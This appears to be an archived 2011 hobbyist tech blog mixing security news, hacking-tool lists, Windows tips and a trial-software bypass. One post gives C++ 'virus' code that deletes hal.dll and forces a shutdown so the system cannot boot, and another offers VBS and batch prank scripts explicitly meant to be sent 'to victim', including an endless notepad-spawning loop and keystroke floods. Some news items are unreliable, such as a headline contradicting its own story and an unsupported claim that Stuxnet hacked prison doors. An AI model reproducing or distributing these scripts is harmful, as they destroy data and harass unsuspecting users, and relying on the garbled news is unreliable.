Tuesday, November 22, 2011

New malware signed with US government digital certificate


It’s rare to find malware that’s been signed with a valid digital certificate. What’s even rarer is what researchers at software security company F-Secure found: Malware that’s been signed with an official key that once belonged to the Malaysian government.

The malware in question takes advantage of an exploit in Adobe Reader 8 and spreads via malicious PDF files. Once exploited, the malware then downloads additional malicious components, some of which are also signed by a commercial website, from a server called worldnewsmagaizines.org.

Monday, November 21, 2011

Five Big Security Threats for 2011



We introduce you to this year's batch of security vulnerabilities to watch out for. Online malicious activity was a major headache in 2010, and so far, 2011 is no different: We've seen scams and malware on Twitter, Facebook, and the Android Market, as well as a rise in politically motivated online attacks. But that's no surprise to security experts such as Graham Cluley, senior technology consultant for security firm Sophos. Cluley says that Sophos analyzes about 95,000 pieces of malware every day that is either brand-new or a variant of an older attack.

The bad guys are hard at work figuring out new ways to infect your system. The good news is that the latest antivirus programs do a better job than ever at detecting suspicious activity before it can damage your computer.

Sunday, November 20, 2011

New Stuxnet Worm: Computerized Prison doors Can be Hacked



       According to Computer researchers John Strauchs, Tiffany Rad and Teague Newman have recently discovered a new way to hack into computerized prison doors without any difficulty. It just took security researchers very few amount of equipment and a workspace to get through it.

         According To Strauchs: "I designed a maximum security prison security system. That is, I did the engineering quite a few years ago and literally on Christmas Eve, the warden of that prison after it was occupied, called me and told me all the doors had popped open, including on death row, which of course sent chills down my spine. So we fixed that problem very quickly. It was a minor technical thing that had to do with the equipment used, but the gist of it was it made me think if that could be done accidentally, what was the extent of what you could do if you did it deliberately?"

          The same mechanism which was used in the Industrial system was used in the computerized prison doors and as Industrial systems were widely being targeted with the stuxnet worm, There is a strong possibility that the computerized prison doors were hacked with the stuxnet worm.

         The Us department of homeland security has confirmed that the attack was successfully carried out. We will update you as soon as we receive more news.

Saturday, November 19, 2011

Some Best Hacking tools to Start With

These are Top 20 Hacking Tools, the list is can go on, and these are a few to name:


Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Download Nessus


Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Download Ethereal


Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
Download Snort


Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
Download Netcat


TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
Download TCPdump


Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
Download Hping


DSniff
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
Download DSniff


GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
Download GFI LANguard


Ettercap
Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.
Download Ettercap


Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
Download Nikto


John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.
Download John the Ripper


OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
Download OpenSSH


TripWire
Tripwire is a tool that can be used for data and program integrity assurance.
Download TripWire


Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
Download Kismet


NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.
Download NetFilter


IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
Download IP Filter


pf
OpenBSD Packet Filter
Download pf


fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.
Download fport


SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
Download SAINT


OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Friday, November 18, 2011

DOS Attacks: Apache Server 2.34 Vulnerable To DOS Attacks



     After the huge success of Apache Killer, another tool has been actively gaining popularity, It's an exploit written by Egyptian hacker named Xenon, The exploit is written in perl and can be easily modified for better results. According to the author this exploit is enough to compromise the availability of whole server with a single computer. Unlike other Apache DDOS tools, This tool has the capability to test if the Apache server is vulnerable to the attack or not.

Some Best Free Software for your Desktop and Laptop


Top 10 free software for laptop and desktop to enhance your productivity and security.Software which solve your synchronization, battery, Wi-Fi and USB problems. They’ll make it easier and more fun to get your work done, too.

Synchronization Tools:
If you own a desktop and a laptop, you frequently have to deal with synchronizing files and folders between them. If you’re not careful, you’ll end up working on older files on one computer while the newer versions will on the other. Worse case scenario: when copying files between the machines, you might accidentally overwrite a newer version with an older one. The following three freebies solve those problems for you. They can synchronize your files automatically, and they can even synchronise between PCs and Macs.

SugarSync Free:
This excellent software work as a synchronization tool and also as an automated backup program. Simple to use, it also offers 2GB of free online backup space, takes up little RAM and few system resources, and works with Macs as well as PCs. All that, and it’s free.

Simply install the software on your computers and indicate which folders to synchronise. SugarSync Free then works in the background. If the computer to which you wish to sync is not online, the files will sync to it when it returns. In addition to syncing the files, SugarSync Free backs them up online.

You can do a lot more, too, such as sharing files and folders with other people. The software also keeps older versions of your file online so that you can revert to any of them.

The free edition of the software will synchronise only two computers, and it has a limit of 2GB of online storage space. For-pay versions let you synchronise among multiple PCs and offer faster upload speeds; prices range from $5 per month to $25 per month.

Download SugarSync Free

Windows Live Sync:
What if you want to synchronise your laptop with more than one other desktop or laptop, but you don’t want to spend the money that SugarSync charges for it? Give the free Windows Live Sync a try. With this tool, you can sync folders on as many computers as you want, and you don’t have to pay a penny. Keep in mind, however, that this software doesn’t include online backup; it only synchronises folders from computer to computer.

Download Windows Live Sync

Laptop Battery Managers:
Ah batteries, backbone of every laptop. They never seem to have enough power, and they run out too quickly. here these downloads will help you manage your laptop’s battery life, and they can even help you get more out of your battery.

BattCursor:
You have work to do, but you know that your battery is starting to run out. So you keep checking the laptop’s battery icon to see how much power is left and every time you check, you waste precious time. Sound familiar?

This clever, free program shows your laptop’s remaining battery life on your mouse cursor. The app can display the information on your desktop, as well.

Download BattCursor

BatteryBar:
Want to check battery life, without moving your mouse cursor on battery icon. BatteryBar shows, on your taskbar, exactly how much power you’ve already used and how much you have left. You can set the app to display remaining battery life either as a percentage or as an amount of time.

Hover your mouse over BatteryBar, and you’ll see even more information, including the total battery capacity, the discharge rate, the battery wear, and how much total capacity your battery has in terms of time per full charge.

When you first run the program, it won’t appear to work. You’ll need to configure your taskbar to display it. Right click the taskbar, and select Toolbars, Taskbar. Once you do that, the program will appear.

Download BatteryBar

Wireless Networking Utilities:
One of the main reasons to use a laptop is that you can connect wirelessly when you’re away from your home or office. But finding a connection, and keeping safe when you are connected, can be problematic. Here are two downloads that can help.

Hotspot Shield:
When you use your laptop to connect to a hotspot at a public location such as a coffee shop or airport, you put yourself at risk. Hackers may be able to sniff your data packets, invade your PC and steal your username and password when you log in to websites.

Here’s a freebie that promises to keep you safe by encrypting your connection when you’re at a hotspot so that no one else can read the information you send. The program is extremely easy to use. Install it and it logs you in to a virtual private network (VPN) that performs the encryption.

Download Hotspot Shield

WeFi:
If you’re a laptop owner and a fan of social networking, you can combine the two with WeFi. Not only does this program find hotspots so that you can connect to them, but it also finds people to whom you can connect as well. After you install WeFi, the app lists nearby hotspots along with information about each, such as the signal strength and whether the hotspot is encrypted. To connect to one, double click it. You can also go to a web page that displays a map of where you are and shows nearby hotspots.

To see people who are connected to hotspots near you, click the People tab. You can then see more information about any of them, and get in touch with them via the software.

WeFi also includes a feature that will warn you away from suspicious web pages. If you prefer, however, you can turn it off during the installation process: Uncheck the box next to Include Wi-Fi Secure Browsing.

Download WeFi

USB Flash Drive Programs:
USB flash drives are designed to be portable, just like your laptop. But they can be problematic. For one thing, how can you make sure that your files aren’t compromised in the event that you lose your drive? We have a few downloads to help with that, and more.

PortableApps:
If your laptop or netbook has only a modest hard drive, you may not be able to fit all of your applications on it. Microsoft Office, for example, can occupy plenty of hard disk space and leave you little room for anything else.

With PortableApps, you won’t have that problem. In this download you get a full suite of free applications, including OpenOffice.org, which has a word processor, a spreadsheet, a presentation program, a database, and a drawing program. You’ll also find an antivirus utility, a slimmed down version of Firefox, and more. In addition to the applications, you get backup software, plus a menu that makes accessing all of the programs easy.

The Light version takes up just 150MB installed, and the more full featured Standard version consumes 355MB. You can install the software on your laptop or netbook of course, but to save space you can install the programs on a USB drive and even run them from there. You can store your data on the USB drive as well. No matter how little storage space your laptop or netbook has, you’ll be set.

Download PortableApps Standard

TrueCrypt

USB drives are a great way to carry work with you when you travel. They’re light, they’re cheap, and they have enough capacity to handle large image files, hefty documents, and entire presentations. But you can easily lose or misplace them, a serious problem if your files are personal or sensitive.

The free TrueCrypt does an excellent job of keeping your files safe from prying eyes, even if your USB drive falls into the wrong hands. You get a choice of many different encryption algorithms, including the powerful 256-bit AES and 448-bit Blowfish methods. The program will not just encrypt the files and folders, but also hide them so that no one but you knows that they are there.

This isn’t the most intuitive of programs to work with, so take some time to read the manual and be sure to use the program’s built-in wizards.

Download TrueCrypt

Enjoy...!!!

Thursday, November 17, 2011

Learn How to Write C++ Virus

Hey Guys, today i will show you how to write C++ virus, which will delete hal.dll file from computer, and without which system will not boot.

Warning: Try at your own risk.

compile following code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("c:\\windows\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this script which finds system drives automatically, some times it can be in D:\Windows, for that compile following code:


#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

Enjoy..!!!

Wednesday, November 16, 2011

Small Notepad Tricks for Fun...!!!



Hey Guys, In this post I will show you some notepad tricks. Which you can use on your friends and enemy’s just for fun. Copy following codes in notepad and save as specified.

Pop out of cd drive continually:

set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Now save it as “anyname.VBS” and then click it.

Toggle Caps Lock button:

set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Now save it as “anyname.VBS” and click on it.

Shut down some one’s PC with your customize message:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" –S

And save it as ”anyname.BAT” and send to victim.

Small script to frustrate you friends/enemy which hit enter simultaneously:

set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Now save it as “anyname.VBS” and send to victim.

Small script to frustrate you friends/enemy which hit enter simultaneously:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Now save it as “anyname.VBS” and send to victim.

Hack victims keyboard and forcefully make him type “You are a fool” continuously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Now save it as “anyname.VBS” and send to victim.

Open notepad continually in victims machine:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Now save it as “anyname.BAT” and send to victim.


Tuesday, November 15, 2011

Run your Trial Software Lifetime

With help of this post you can run any trial software which comes with some finite timeline period - for example 15 days trial - you can run it for your lifetime period just in 2 simple steps without changing date/time and registry:


Step 1: Download RunAsDate, and open it.






Step 2: Now click on Browse - select application, installed date of that application - and click run.


Important Note:


1: Note down the date and time, when you install the software for the first time.
2: Once the trial period expires, you must always run the software using RunAsDate.
3: After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.
4: It is better and safe to inject the date of the last day in the trial period. For example, if the trial period expires on dec 31 2011 then always insert the date as dec 30 2011 in the RunAsDate.

Monday, November 14, 2011

Awesome Google Syntax for search

Some of google's awesome features i am listing here - which we need in our day to day life:


Calculator:
when ever you need to calculate figures, just use google's search bar as a calculator. Just put your mathematical expression in it and hit enter, you can even convert currency, volume, etc.
Example:
55555 * 5
100 pound = ?kilograms
10.5 cm in inches
population INDIA


Word Definitions:
If you need to quickly look up the definition of a word or phrase.
Example:
define:wireless


Intitle:
This Syntax will restricts your search to the titles of web pages. The variation allintitle: finds pages wherein all the words specified appear in the title of the web page. Using allintitle: is basically the same as using the intitle: before each keyword.
examples:
intitle:”barack obama”
allintitle:”money supply” economics
You may wish to avoid the allintitle: variation, because it doesn’t mix well with some of the other syntax elements.


Intext:
This Syntax will searches only body text (i.e., ignores link text, URLs, and titles). While its uses are limited, it’s perfect for finding query words that might be too common in URLs or link titles.
examples:
Intext:”tricksandtweaks.tk”
Intext:html
There’s also an allintext: variation, but again, this doesn’t play well with others.


Inanchor:
This Syntax will searches for text in a page’s link anchors. A link anchor is the descriptive text of a link. For example, the link anchor in the HTML code
example:
inanchor:”tricksandtweaks.tk″
As with other in*: syntax elements, there’s an allinanchor: variation, which works in a similar way (i.e., all the keywords specified must appear in a page’s link anchors).


Link:
Lets you see which pages are linking to your Web page or to another page you’re interested in.
example:
link:http:// tricksandtweaks.tk


Site:
This Syntax will allows you to narrow your search by either a site or a top-level domain.
examples:
site: tricksandtweaks.tk
site:edu
site:nc.us


Inurl:
This feature will restricts your search to the URLs of web pages. This syntax tends to work well for finding search and help pages, because they tend to be rather regular in composition.
example:
inurl:help
You’ll see that using the inurl: query instead of the site: query has one immediate advantage you can use it to search subdirectories. While the http:// prefix in a URL is ignored by Google when used with site:, search results come up short when including it in an inurl: query. Be sure to remove prefixes in any inurl: query for the best (read: any) results.
You can also use inurl: in combination with the site: syntax to draw out information on subdomains. For example, how many subdomains does google.com really have? A quick query will help you figure that out:


example:
site:google.com -inurl:www.google.com
This query asks Google to list all pages from the google.com domain, but leave out those pages which are from the common subdomain www, since you already know about that one
Do you ever wonder how many subdomains google has.I wondered!!!!


Cache:
cache: This feature will finds a copy of the page that Google indexed even if that page is no longer available at its original URL or has since changed its content completely.


example:
cache:tricksandtweaks.tk
If Google returns a result that appears to have little to do with your query, you’re almost sure to find what you’re looking for in the latest cached version of the page at Google. The Google cache is particularly useful for retrieving a previous version of a page that changes often.


Filetype:
filetype: This feature will searches the suffixes or filename extensions. These are usually, but not necessarily, different file types - filetype:jpg and filetype:jppeg will give you different result counts, even though they’re the same file type. You can even search for different page generators — such as ASP, PHP, CGI, and so forth — presuming the site isn’t hiding them behind redirection and proxying. Google indexes several different Microsoft formats, including PowerPoint (.ppt), Excel (.xls), and Word (.doc).


examples:
“learn C#” filetype:pdf
“IT books” filetype:doc


Related:
related: As you might expect, This will finds pages that are related to the specified page. This is a good way to find categories of pages.
examples:
related:www.google.com
related:www.bbc.com


Info:
info: This will provides a page of links to more information about a specified URL. This information includes a link to the URL’s cache, a list of pages that link to the URL, pages that are related to the URL, and pages that contain the URL.


examples:
info:www.tricksandtweaks.tk
Note that this information is dependent on whether Google has indexed the specified URL; if not then information might not sufficient.


Phonebook:
You can use following syntex for this feature.
examples:
phonebook:Michael Jackson
phonebook:(611) 555-5555




Source: Google features

Sunday, November 13, 2011

Hidden Features: System Energy Efficiency Reoprt

Today i will provide you information about new functionality within the windows 7 - i.e. PowerCfg utility for evaluating system energy efficiency. You can use these PowerCfg enhancements to diagnose and resolve your problems with portable computer battery life and desktop energy efficiency.Sometimes you experiences power-related issues, such as the inability to go into standby or hibernate mode, the problem usually lies with incorrectly configured power management settings.


Windows 7's Power Efficiency Report can help you to identify the potential problem. To generate report follow steps:


Step 1: Run command prompt with a administration privileges.




Step 2: Write powercfg -energy hit enter.




Step 3: It will generate report in c:\windows\system32\energy-report.html





Saturday, November 12, 2011

Hidden Features: Problem Steps Recorder

Most time we are unable to explain our PC's problem to support / maintenance person, it's much better to let them see for themselves what's happening on your system. At that time the Problem Steps Recorder may be the next best thing.

Step 1: Search for and run psr from the Start menu.



Step 2: Click Start Record, and the utility will record your activities through a series of screen shots, automatically including captions that show exactly where you clicked.



You can also use the Add Comment button to highlight specific areas of the screen and insert custom messages. When you stop recording, everything will be stitched together and saved as a Web browser-compatible MHTML (MIME HTML) file, conveniently ZIPped and ready for e-mailing to your Support / maintenance person.

Friday, November 11, 2011

Hidden Features: Reliability Monitor

When your system's performance goes down and its not working properly and you're trying to figure out what's going on, at that time Reliability Monitor may help you. Search reliability from the Start menu search-bar, and run View reliability history




You'll get a graph of your system's stability index over a period of days and weeks. It displays which programs, Windows components, or any other miscellaneous items crashed on a given day, helping you identify problem items.



Thursday, November 10, 2011

Hidden Features: "GOD Mode" in Windows 7...

It may sound like hidden GOD mode in some game, but windows 7 really have god mode. It conveniently puts hundreds of settings from all around the operating system at one place.


To turn on God mode, create a new folder on your desktop or anywhere you like, and name it as: GodMode.{ED7BA470-8E54-465E-825C-99712043e01C}




The resulting folder will contain 270 items, representing almost every configuration in windows 7.



Wednesday, November 9, 2011

Activate windows 7 hidden themes...

Sorry for not updating my blog for some day, was little bit busy wid study. Today i am gonne tech you to activate windows 7 hidden themes in just 2 steps.


Step 1: Go to c:\windows\winsxs


Step 2: In the search bar type: *.theme and you will find hidden regional themes in your search result.



Sunday, November 6, 2011

Remove unnecessary items from Right-click Context menu


Sometimes your right click menu becomes too big and you feel uncomfortable with it. So if you would like to remove some items from it, then defiantly you can do it with following steps:

Step 1: Click Start, click Run, type regedit and then click OK.

Step 2: Locate the following registry key: HKEY_LOCAL_ROOT\*\shellex\ContextMenuHandlers



Step 3: Before delete any entry, take backup by right-clicking on the SmartFTP folder and slecting Export.

Step 4: Now remove entries which you don’t want in right click menu.

Saturday, November 5, 2011

Enable Encryption shortcut in Right Click menu


Encrypt you Hard drive, Pen drives, Folder and Files by Bit locker which is  windows inbuilt encryption mechanism. To activate this encryption / decryption menu in your right click menu, just follow the simple steps:

Step 1: Click Start, click Run, type regedit, and then click OK.

Step 2: Locate the following registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Step 3: Create new field with field name EncryptionContextMenu and and field type should be DWORD or REG_DWORD. Now change its value to 1 from 0.



Step 4: Save and Exit.



Now right click on any folder or drive, and you can see new option Encryption. So now you can keep you confidential things safely by using this utility.

Thursday, November 3, 2011

Make Windows Log On Automatically

You can enable auto logon without entering any password at windows start-up by to methods, either by editing registry value or by using in-build wizard facility. Here I will teach you both the ways.

First we will see how to enable autologon by changing registry value. Just follow these simple steps:


Step 1: Click Start, click Run, type regedit, and then click OK.


Step 2: Locate the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


Step 3: Using your account name and password, double-click the DefaultUserName entry, type your user name, and then click OK.


Step 4: Double-click the DefaultPassword entry, type your password under the value data box, and then click OK.


If there is no DefaultPassword value, create the value. To do this, follow these steps:


In Registry Editor, click Edit, click New, and then click String Value.
Type DefaultPassword as the value name, and then press ENTER.
Double-click the newly created key, and then type your password in the Value Data box.


Note: If the DefaultPassword registry entry does not exist, Windows automatically change the value of the AutoAdminLogonregistry key from 1 to 0 to turn off the AutoAdminLogon feature after the computer is restarted.


Step 5: Double-click the AutoAdminLogon entry, type 1 in the Value Data box, and then click OK.


If there is no AutoAdminLogon entry, create the entry. To do this, follow these steps:


In Registry Editor, click Edit, click New, and then click String Value.
Type AutoAdminLogon as the value name, and then press ENTER.Double-click the newly created key, and then type 1 in the Value Data box.





Step 6: Exit Registry Editor.


Step 7: Click Start, click Restart, and then click OK.


After your computer restarts and Windows XP starts, you can log on automatically.




Another way of enabling Autologon is as follows:


Step 1: Click Start, click Run, type netplwiz, and then click OK.


Step 2: Uncheck the box – User must enter a username and password to use this computer, and then click Apply.




Step 3: New window will open, which ask for your username and password. Enter appropriate information and click OK.


After your computer restarts and Windows XP starts, you can log on automatically.


Shortcut Keys in Windows 7


Windows + T

This shortcut similarly work as Alt + Tab, but Windows + T cycle through open programs in the taskbar’s shortcut menu.

Windows + Space

This shortcut performs the same function as moving your mouse on the Show Desktop button situated at the bottom right of the taskbar. It makes every window transparent and you can see youre desktop.

Ctrl + Shift + Click

If you want to open any application with Full Administrative Rights, then just use Ctrl + Shift and then click on the application or program.

Ctrl + Click

When you click on any application while holding Ctrl key, it will open new window of program every time. For example you can use this shortcut to open many internet explorer windows.

Wednesday, November 2, 2011

Shortcut Keys in Windows 7

Hey Guys, lets explore some keyboard shortcuts in windows 7. Some of them are old and some are first time introduced in windows 7.


Alt + P
In windows explorer you can activate an additional preview pan to the right side of the window by Alt + P shortcut. This pane is convenient for image previewing. 

Windows + Up arrow / Windows + Down arrow
You can maximize windows by pressing Windows + Up, and by pressing Windows + Down, it will resize active window. It will not work if window is minimized.

Windows + Shift + Up
When you use this shortcut while a window is active will stretch it vertically to the maximum desktop height; however the width of the window will remain same. And by pressing Windows + Down will restore it to its previous size.

Windows + Right arrow / Windows + Left arrow
This is one of the new features of windows 7, the ability to automatically make a window fill up in half of your screen by dragging it to the left or right. These shortcuts do the same thing for you without using your mouse.


More to come in next post...keep visiting....

Tuesday, November 1, 2011

Easy Photo Resize Tool

Looking for some easy photo resize tool then say thanks to faststone.org, they provide you very light weight  but effective solution for rezing your photo with many other options. Just try it.